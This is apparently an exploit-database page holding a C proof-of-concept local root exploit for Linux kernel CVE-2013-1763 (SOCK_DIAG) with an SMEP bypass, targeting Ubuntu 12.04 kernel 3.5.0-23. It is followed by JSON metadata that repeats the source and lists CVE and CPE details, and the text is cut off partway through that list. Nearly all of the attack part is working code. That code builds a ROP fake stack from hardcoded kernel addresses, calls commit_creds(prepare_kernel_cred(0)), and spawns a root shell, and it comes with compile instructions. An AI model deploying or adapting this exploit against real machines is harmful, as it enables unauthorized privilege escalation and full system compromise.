Search...

Linux Kernel 3.5.0-23 (Ubuntu 12.04.2 x64) - SOCK_DIAG SMEP Bypass Local Privilege Escalation Exploi

2018-03-19T00:00:00

ID 1337DAY-ID-30004
Type zdt
Reporter Vitaly Nikolenko
Modified 2018-03-19T00:00:00

Description

Exploit for linux platform in category local exploits

                                        
                                            /** 
 * based on the exploit by SynQ
 *
 * Modified PoC for CVE-2013-1763 with SMEP bypass
 * Presentation: Practical SMEP Bypass Techniques on Linux
 * Vitaly Nikolenko
 * [email protected]
 * 
 * Target: Linux ubuntu 3.5.0-23-generic #35~precise1-Ubuntu SMP Fri Jan 25 17:13:26 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
 *
 * gcc sockdiag_smep.c -O2 -o pwn 
 */
 
/**
 EDB Note: Video ~ https://youtu.be/jHJd-5NvWlQ
**/
 
#include &lt;unistd.h&gt;
#include &lt;sys/socket.h&gt;
#include &lt;netinet/tcp.h&gt;
#include &lt;errno.h&gt;
#include &lt;linux/if.h&gt;
#include &lt;linux/filter.h&gt;
#include &lt;string.h&gt;
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;linux/inet_diag.h&gt;
#include &lt;sys/mman.h&gt;
#include &lt;assert.h&gt;
//#include &lt;linux/sock_diag.h&gt;
//#include &lt;linux/unix_diag.h&gt;
//#include &lt;linux/netlink.h&gt;
#include "sock_diag.h"
#include "unix_diag.h"
#include "netlink.h"
 
unsigned long user_cs;
unsigned long user_ss;
unsigned long user_rflags;
 
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;
 
static void saveme() {
    asm(
    "movq %%cs, %0\n"
    "movq %%ss, %1\n"
    "pushfq\n"
    "popq %2\n"
    : "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory"       );
}
 
void shell(void) {
    if(!getuid())
        system("/bin/sh");
 
    exit(0);
}
 
static void restore() {
    asm volatile(
    "swapgs ;"
    "movq %0, 0x20(%%rsp)\t\n"
    "movq %1, 0x18(%%rsp)\t\n"
    "movq %2, 0x10(%%rsp)\t\n"
    "movq %3, 0x08(%%rsp)\t\n"
    "movq %4, 0x00(%%rsp)\t\n"
    "iretq"
    : : "r" (user_ss),
        "r" ((unsigned long)0x36000000),
        "r" (user_rflags),
        "r" (user_cs),
        "r" (shell)
    );
}
 
int __attribute__((regparm(3)))
kernel_code()
{
    commit_creds(prepare_kernel_cred(0));
    restore();
     
    return -1;
}
 
int main(int argc, char*argv[])
{
    int fd;
 
    struct sock_diag_handler {
        __u8 family;
        int (*dump)(void *a, void *b);
    };
 
    unsigned family;
    struct {
        struct nlmsghdr nlh;
        struct unix_diag_req r;
    } req;
 
    if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) &lt; 0){
        printf("Can't create sock diag socket\n");
        return -1;
    }
 
    void *mapped;
    void *fakestruct;
    struct sock_diag_handler a;
    a.dump = (void *)0xffffffff8100b74f;
 
    commit_creds = (_commit_creds) 0xffffffff8107ee30;
    prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107f0c0;
 
    assert((fakestruct = mmap((void *)0x10000, 0x10000, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_FIXED|MAP_POPULATE, 0, 0)) == (void*)0x10000);
    memcpy(fakestruct+0xad38, &a, sizeof(a));
 
    assert((mapped = mmap((void*)0x35000000, 0x10000000, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_POPULATE|MAP_FIXED|MAP_GROWSDOWN, 0, 0)) == (void*)0x35000000);
 
    unsigned long *fakestack = (unsigned long *)mapped;
    *fakestack ++= 0xffffffff01661ef4;
    int p;
    for (p = 0; p &lt; 0x1000000; p++)
        *fakestack ++= 0xffffffff8100ad9eUL;
     
    fakestack = (unsigned long *)(mapped + 0x7000000);
    printf("[+] fake stack addr = %lx\n", (long unsigned)fakestack);
    *fakestack ++= 0xffffffff8133dc8fUL;
    *fakestack ++= 0x407e0;
    *fakestack ++= 0xffffffff810032edUL;
    *fakestack ++= 0xdeadbeef;
    *fakestack ++= (unsigned long)kernel_code; // transfer control to our usual shellcode
 
    memset(&req, 0, sizeof(req));
    req.nlh.nlmsg_len = sizeof(req);
    req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
    req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
    req.nlh.nlmsg_seq = 123456;
 
    req.r.sdiag_family = 45;
 
    req.r.udiag_states = -1;
    req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;
 
    saveme();
    if ( send(fd, &req, sizeof(req), 0) &lt; 0) {
        printf("bad send\n");
        close(fd);
        return -1;
    }
}

#  0day.today [2018-04-03]  #

JSON Vulners Source

Initial Source

{"sourceData": "/** \r\n * based on the exploit by SynQ\r\n *\r\n * Modified PoC for CVE-2013-1763 with SMEP bypass\r\n * Presentation: Practical SMEP Bypass Techniques on Linux\r\n * Vitaly Nikolenko\r\n * [email\u00a0protected]\r\n * \r\n * Target: Linux ubuntu 3.5.0-23-generic #35~precise1-Ubuntu SMP Fri Jan 25 17:13:26 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux\r\n *\r\n * gcc sockdiag_smep.c -O2 -o pwn \r\n */\r\n \r\n/**\r\n EDB Note: Video ~ https://youtu.be/jHJd-5NvWlQ\r\n**/\r\n \r\n#include <unistd.h>\r\n#include <sys/socket.h>\r\n#include <netinet/tcp.h>\r\n#include <errno.h>\r\n#include <linux/if.h>\r\n#include <linux/filter.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <linux/inet_diag.h>\r\n#include <sys/mman.h>\r\n#include <assert.h>\r\n//#include <linux/sock_diag.h>\r\n//#include <linux/unix_diag.h>\r\n//#include <linux/netlink.h>\r\n#include \"sock_diag.h\"\r\n#include \"unix_diag.h\"\r\n#include \"netlink.h\"\r\n \r\nunsigned long user_cs;\r\nunsigned long user_ss;\r\nunsigned long user_rflags;\r\n \r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\nunsigned long sock_diag_handlers, nl_table;\r\n \r\nstatic void saveme() {\r\n asm(\r\n \"movq %%cs, %0\\n\"\r\n \"movq %%ss, %1\\n\"\r\n \"pushfq\\n\"\r\n \"popq %2\\n\"\r\n : \"=r\" (user_cs), \"=r\" (user_ss), \"=r\" (user_rflags) : : \"memory\" );\r\n}\r\n \r\nvoid shell(void) {\r\n if(!getuid())\r\n system(\"/bin/sh\");\r\n \r\n exit(0);\r\n}\r\n \r\nstatic void restore() {\r\n asm volatile(\r\n \"swapgs ;\"\r\n \"movq %0, 0x20(%%rsp)\\t\\n\"\r\n \"movq %1, 0x18(%%rsp)\\t\\n\"\r\n \"movq %2, 0x10(%%rsp)\\t\\n\"\r\n \"movq %3, 0x08(%%rsp)\\t\\n\"\r\n \"movq %4, 0x00(%%rsp)\\t\\n\"\r\n \"iretq\"\r\n : : \"r\" (user_ss),\r\n \"r\" ((unsigned long)0x36000000),\r\n \"r\" (user_rflags),\r\n \"r\" (user_cs),\r\n \"r\" (shell)\r\n );\r\n}\r\n \r\nint __attribute__((regparm(3)))\r\nkernel_code()\r\n{\r\n commit_creds(prepare_kernel_cred(0));\r\n restore();\r\n \r\n return -1;\r\n}\r\n \r\nint main(int argc, char*argv[])\r\n{\r\n int fd;\r\n \r\n struct sock_diag_handler {\r\n __u8 family;\r\n int (*dump)(void *a, void *b);\r\n };\r\n \r\n unsigned family;\r\n struct {\r\n struct nlmsghdr nlh;\r\n struct unix_diag_req r;\r\n } req;\r\n \r\n if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){\r\n printf(\"Can't create sock diag socket\\n\");\r\n return -1;\r\n }\r\n \r\n void *mapped;\r\n void *fakestruct;\r\n struct sock_diag_handler a;\r\n a.dump = (void *)0xffffffff8100b74f;\r\n \r\n commit_creds = (_commit_creds) 0xffffffff8107ee30;\r\n prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107f0c0;\r\n \r\n assert((fakestruct = mmap((void *)0x10000, 0x10000, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_FIXED|MAP_POPULATE, 0, 0)) == (void*)0x10000);\r\n memcpy(fakestruct+0xad38, &a, sizeof(a));\r\n \r\n assert((mapped = mmap((void*)0x35000000, 0x10000000, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_POPULATE|MAP_FIXED|MAP_GROWSDOWN, 0, 0)) == (void*)0x35000000);\r\n \r\n unsigned long *fakestack = (unsigned long *)mapped;\r\n *fakestack ++= 0xffffffff01661ef4;\r\n int p;\r\n for (p = 0; p < 0x1000000; p++)\r\n *fakestack ++= 0xffffffff8100ad9eUL;\r\n \r\n fakestack = (unsigned long *)(mapped + 0x7000000);\r\n printf(\"[+] fake stack addr = %lx\\n\", (long unsigned)fakestack);\r\n *fakestack ++= 0xffffffff8133dc8fUL;\r\n *fakestack ++= 0x407e0;\r\n *fakestack ++= 0xffffffff810032edUL;\r\n *fakestack ++= 0xdeadbeef;\r\n *fakestack ++= (unsigned long)kernel_code; // transfer control to our usual shellcode\r\n \r\n memset(&req, 0, sizeof(req));\r\n req.nlh.nlmsg_len = sizeof(req);\r\n req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;\r\n req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;\r\n req.nlh.nlmsg_seq = 123456;\r\n \r\n req.r.sdiag_family = 45;\r\n \r\n req.r.udiag_states = -1;\r\n req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;\r\n \r\n saveme();\r\n if ( send(fd, &req, sizeof(req), 0) < 0) {\r\n printf(\"bad send\\n\");\r\n close(fd);\r\n return -1;\r\n }\r\n}\n\n# 0day.today [2018-04-03] #", "description": "Exploit for linux platform in category local exploits", "sourceHref": "https://0day.today/exploit/30004", "reporter": "Vitaly Nikolenko", "href": "https://0day.today/exploit/description/30004", "type": "zdt", "viewCount": 12, "references": [], "lastseen": "2018-04-03T17:37:16", "published": "2018-03-19T00:00:00", "cvelist": ["CVE-2013-1763"], "id": "1337DAY-ID-30004", "modified": "2018-03-19T00:00:00", "title": "Linux Kernel 3.5.0-23 (Ubuntu 12.04.2 x64) - SOCK_DIAG SMEP Bypass Local Privilege Escalation Exploi", "edition": 1, "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2018-04-03T17:37:16", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1763"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310841343", "OPENVAS:841339", "OPENVAS:1361412562310865399", "OPENVAS:1361412562310850425", "OPENVAS:841341", "OPENVAS:865401", "OPENVAS:841343", "OPENVAS:865399", "OPENVAS:1361412562310841341", "OPENVAS:1361412562310841339"]}, {"type": "exploitdb", "idList": ["EDB-ID:33336", "EDB-ID:24746", "EDB-ID:24555", "EDB-ID:44299"]}, {"type": "ubuntu", "idList": ["USN-1749-1", "USN-1751-1", "USN-1750-1"]}, {"type": "zdt", "idList": ["1337DAY-ID-20499", "1337DAY-ID-22258"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29114", "SECURITYVULNS:VULN:12888"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:E0C7D9E17F3479DD89B304D4E8F8DBAE", "EXPLOITPACK:5F70F8E747822C4EE26CF99F2739F154"]}, {"type": "saint", "idList": ["SAINT:2FD3877414CB9609C42A165E6BCB9C92", "SAINT:339ABC340D52FAD12C4D62B93D85D32F", "SAINT:18A030A4FCD5D3FC247DC77100CC35FB"]}, {"type": "nessus", "idList": ["UBUNTU_USN-1751-1.NASL", "REDHAT-RHSA-2013-0622.NASL", "FEDORA_2013-3086.NASL", "FEDORA_2013-3106.NASL", "OPENSUSE-2013-440.NASL", "MANDRIVA_MDVSA-2013-176.NASL", "UBUNTU_USN-1750-1.NASL", "UBUNTU_USN-1749-1.NASL", "OPENSUSE-2013-175.NASL"]}, {"type": "seebug", "idList": ["SSV:86561"]}, {"type": "fedora", "idList": ["FEDORA:E955220909", "FEDORA:8F36120DDE", "FEDORA:93F5A20E0E", "FEDORA:813C021894", "FEDORA:45F8621614", "FEDORA:49FE4218C6", "FEDORA:D141D21DDE", "FEDORA:455A22792E", "FEDORA:D33BC210C9", "FEDORA:2DA2A20783"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0395-1"]}, {"type": "redhat", "idList": ["RHSA-2013:0622"]}], "modified": "2018-04-03T17:37:16", "rev": 2}, "vulnersScore": 6.5}}

{"cve": [{"lastseen": "2020-12-09T19:52:39", "description": "Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag.c in the Linux kernel before 3.7.10 allows local users to gain privileges via a large family value in a Netlink message.", "edition": 5, "cvss3": {}, "published": "2013-02-28T19:55:00", "title": "CVE-2013-1763", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1763"], "modified": "2014-05-16T04:15:00", "cpe": ["cpe:/o:linux:linux_kernel:3.7", "cpe:/o:linux:linux_kernel:3.0.36", "cpe:/o:linux:linux_kernel:3.4.4", "cpe:/o:linux:linux_kernel:3.1.4", "cpe:/o:linux:linux_kernel:3.1.7", "cpe:/o:linux:linux_kernel:3.0.30", "cpe:/o:linux:linux_kernel:3.4.10", "cpe:/o:linux:linux_kernel:3.2.14", "cpe:/o:linux:linux_kernel:3.0.27", "cpe:/o:linux:linux_kernel:3.2.7", "cpe:/o:linux:linux_kernel:3.4.19", "cpe:/o:linux:linux_kernel:3.4.21", "cpe:/o:linux:linux_kernel:3.2.24", "cpe:/o:linux:linux_kernel:3.2.25", "cpe:/o:linux:linux_kernel:3.5.5", "cpe:/o:linux:linux_kernel:3.0.33", "cpe:/o:linux:linux_kernel:3.3.6", "cpe:/o:linux:linux_kernel:3.2.8", "cpe:/o:linux:linux_kernel:3.0.9", "cpe:/o:linux:linux_kernel:3.4.23", "cpe:/o:linux:linux_kernel:3.4.2", "cpe:/o:linux:linux_kernel:3.4.13", "cpe:/o:linux:linux_kernel:3.2.29", "cpe:/o:linux:linux_kernel:3.2.18", "cpe:/o:linux:linux_kernel:3.0.6", "cpe:/o:linux:linux_kernel:3.6.10", "cpe:/o:linux:linux_kernel:3.6.5", "cpe:/o:linux:linux_kernel:3.0.17", "cpe:/o:linux:linux_kernel:3.6", "cpe:/o:linux:linux_kernel:3.2.23", "cpe:/o:linux:linux_kernel:3.0.10", "cpe:/o:linux:linux_kernel:3.6.3", "cpe:/o:linux:linux_kernel:3.7.3", "cpe:/o:linux:linux_kernel:3.7.8", "cpe:/o:linux:linux_kernel:3.0.40", "cpe:/o:linux:linux_kernel:3.1.3", "cpe:/o:linux:linux_kernel:3.0.7", "cpe:/o:linux:linux_kernel:3.3", "cpe:/o:linux:linux_kernel:3.0.20", "cpe:/o:linux:linux_kernel:3.2.30", "cpe:/o:linux:linux_kernel:3.0.31", "cpe:/o:linux:linux_kernel:3.4.9", "cpe:/o:linux:linux_kernel:3.2.13", "cpe:/o:linux:linux_kernel:3.4.24", "cpe:/o:linux:linux_kernel:3.0.12", "cpe:/o:linux:linux_kernel:3.0.41", "cpe:/o:linux:linux_kernel:3.0.15", "cpe:/o:linux:linux_kernel:3.2.27", "cpe:/o:linux:linux_kernel:3.0.23", "cpe:/o:linux:linux_kernel:3.0.44", "cpe:/o:linux:linux_kernel:3.1.10", "cpe:/o:linux:linux_kernel:3.4.6", "cpe:/o:linux:linux_kernel:3.0.13", "cpe:/o:linux:linux_kernel:3.6.1", "cpe:/o:linux:linux_kernel:3.0.5", "cpe:/o:linux:linux_kernel:3.0.39", "cpe:/o:linux:linux_kernel:3.5.1", "cpe:/o:linux:linux_kernel:3.0.3", "cpe:/o:linux:linux_kernel:3.2.28", "cpe:/o:linux:linux_kernel:3.3.4", "cpe:/o:linux:linux_kernel:3.3.7", "cpe:/o:linux:linux_kernel:3.0.14", "cpe:/o:linux:linux_kernel:3.0.28", "cpe:/o:linux:linux_kernel:3.0.25", "cpe:/o:linux:linux_kernel:3.0.1", "cpe:/o:linux:linux_kernel:3.2.3", "cpe:/o:linux:linux_kernel:3.7.2", "cpe:/o:linux:linux_kernel:3.0.8", "cpe:/o:linux:linux_kernel:3.2.17", "cpe:/o:linux:linux_kernel:3.2.6", "cpe:/o:linux:linux_kernel:3.7.5", "cpe:/o:linux:linux_kernel:3.2.1", "cpe:/o:linux:linux_kernel:3.4.3", "cpe:/o:linux:linux_kernel:3.3.2", "cpe:/o:linux:linux_kernel:3.4.20", "cpe:/o:linux:linux_kernel:3.3.3", "cpe:/o:linux:linux_kernel:3.2.19", "cpe:/o:linux:linux_kernel:3.7.7", "cpe:/o:linux:linux_kernel:3.2.16", "cpe:/o:linux:linux_kernel:3.1.1", "cpe:/o:linux:linux_kernel:3.2.5", "cpe:/o:linux:linux_kernel:3.6.6", "cpe:/o:linux:linux_kernel:3.2.2", "cpe:/o:linux:linux_kernel:3.7.6", "cpe:/o:linux:linux_kernel:3.5.6", "cpe:/o:linux:linux_kernel:3.4.22", "cpe:/o:linux:linux_kernel:3.0.18", "cpe:/o:linux:linux_kernel:3.0.19", "cpe:/o:linux:linux_kernel:3.1.5", "cpe:/o:linux:linux_kernel:3.0.26", "cpe:/o:linux:linux_kernel:3.4", "cpe:/o:linux:linux_kernel:3.4.17", "cpe:/o:linux:linux_kernel:3.6.9", "cpe:/o:linux:linux_kernel:3.0.37", "cpe:/o:linux:linux_kernel:3.0.34", "cpe:/o:linux:linux_kernel:3.0", "cpe:/o:linux:linux_kernel:3.0.32", "cpe:/o:linux:linux_kernel:3.3.8", "cpe:/o:linux:linux_kernel:3.0.16", "cpe:/o:linux:linux_kernel:3.0.38", "cpe:/o:linux:linux_kernel:3.2.4", "cpe:/o:linux:linux_kernel:3.4.15", "cpe:/o:linux:linux_kernel:3.2.15", "cpe:/o:linux:linux_kernel:3.1.9", "cpe:/o:linux:linux_kernel:3.4.18", "cpe:/o:linux:linux_kernel:3.2.20", "cpe:/o:linux:linux_kernel:3.2.12", "cpe:/o:linux:linux_kernel:3.2.21", "cpe:/o:linux:linux_kernel:3.0.2", "cpe:/o:linux:linux_kernel:3.4.8", "cpe:/o:linux:linux_kernel:3.2.11", "cpe:/o:linux:linux_kernel:3.5.7", "cpe:/o:linux:linux_kernel:3.2.22", "cpe:/o:linux:linux_kernel:3.0.4", "cpe:/o:linux:linux_kernel:3.0.42", "cpe:/o:linux:linux_kernel:3.0.21", "cpe:/o:linux:linux_kernel:3.2.9", "cpe:/o:linux:linux_kernel:3.6.7", "cpe:/o:linux:linux_kernel:3.0.29", "cpe:/o:linux:linux_kernel:3.2", "cpe:/o:linux:linux_kernel:3.4.7", "cpe:/o:linux:linux_kernel:3.5.4", "cpe:/o:linux:linux_kernel:3.3.5", "cpe:/o:linux:linux_kernel:3.5.3", "cpe:/o:linux:linux_kernel:3.4.14", "cpe:/o:linux:linux_kernel:3.0.43", "cpe:/o:linux:linux_kernel:3.0.11", "cpe:/o:linux:linux_kernel:3.7.4", "cpe:/o:linux:linux_kernel:3.5.2", "cpe:/o:linux:linux_kernel:3.0.35", "cpe:/o:linux:linux_kernel:3.4.16", "cpe:/o:linux:linux_kernel:3.7.9", "cpe:/o:linux:linux_kernel:3.1", "cpe:/o:linux:linux_kernel:3.6.11", "cpe:/o:linux:linux_kernel:3.4.12", "cpe:/o:linux:linux_kernel:3.1.6", "cpe:/o:linux:linux_kernel:3.0.22", "cpe:/o:linux:linux_kernel:3.0.24", "cpe:/o:linux:linux_kernel:3.7.1", "cpe:/o:linux:linux_kernel:3.6.4", "cpe:/o:linux:linux_kernel:3.1.8", "cpe:/o:linux:linux_kernel:3.1.2", "cpe:/o:linux:linux_kernel:3.3.1", "cpe:/o:linux:linux_kernel:3.6.2", "cpe:/o:linux:linux_kernel:3.2.26", "cpe:/o:linux:linux_kernel:3.6.8", "cpe:/o:linux:linux_kernel:3.4.5", "cpe:/o:linux:linux_kernel:3.4.1", "cpe:/o:linux:linux_kernel:3.2.10", "cpe:/o:linux:linux_kernel:3.4.11"], "id": "CVE-2013-1763", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1763", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.0:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.39:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.43:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.44:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.42:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.40:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.24:*:*:*:*:*:*:*", 